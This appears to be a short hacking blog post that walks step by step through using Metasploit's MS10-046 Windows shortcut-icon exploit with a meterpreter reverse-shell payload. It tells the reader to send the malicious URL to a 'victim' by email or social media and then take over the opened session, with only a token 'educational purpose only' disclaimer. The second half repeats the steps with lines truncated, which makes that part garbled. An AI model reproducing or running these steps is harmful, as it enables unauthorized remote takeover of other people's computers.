Hack Windows XP using Shell Link Code Execution
open terminal and type
root@bt:~# msfconsole
msf >use exploit/windows/browser/ ms10_046_shortcut_icon_dllload er
msf exploit (ms10_046_shortcut_icon_dlllo ader) >set payload windows/meterpreter/ reverse_tcp
msf exploit (ms10_046_shortcut_icon_dlllo ader) > set lhost 192.168.50.131
{my backtrack ip address in your case type yours}
msf exploit (ms10_046_shortcut_icon_dlllo ader) > set srvhost 192.168.50.131
msf exploit (ms10_046_shortcut_icon_dlllo ader) > set uripath /
msf exploit (ms10_046_shortcut_icon_dlllo ader) >exploit
Now an URL you should give to your victim http://192.168.50.131:80/
via email or any social site
msf exploit (ms10_046_shortcut_icon_dlllo ader) >sessions -l
{after the victim click or open that url the sessions will create to view session type the above command}
msf exploit (ms10_046_shortcut_icon_dlllo ader) >sessions -i 1
{to interact with sessions}
meterpreter >sysinfo
NOTE : THIS IS FOR EDUCATIONAL PURPOSE ONLY !! I M NOT RESPONSIBLE FOR ANYTHING YOU DO
Thanks
open terminal and type
root@bt:~# msfconsole
msf >use exploit/windows/browser/
msf exploit (ms10_046_shortcut_icon_dlllo
msf exploit (ms10_046_shortcut_icon_dlllo
{my backtrack ip address in your case type yours}
msf exploit (ms10_046_shortcut_icon_dlllo
msf exploit (ms10_046_shortcut_icon_dlllo
msf exploit (ms10_046_shortcut_icon_dlllo
Now an URL you should give to your victim http://192.168.50.131:80/
via email or any social site
msf exploit (ms10_046_shortcut_icon_dlllo
{after the victim click or open that url the sessions will create to view session type the above command}
msf exploit (ms10_046_shortcut_icon_dlllo
{to interact with sessions}
meterpreter >sysinfo
NOTE : THIS IS FOR EDUCATIONAL PURPOSE ONLY !! I M NOT RESPONSIBLE FOR ANYTHING YOU DO
Thanks
0 comments:
Post a Comment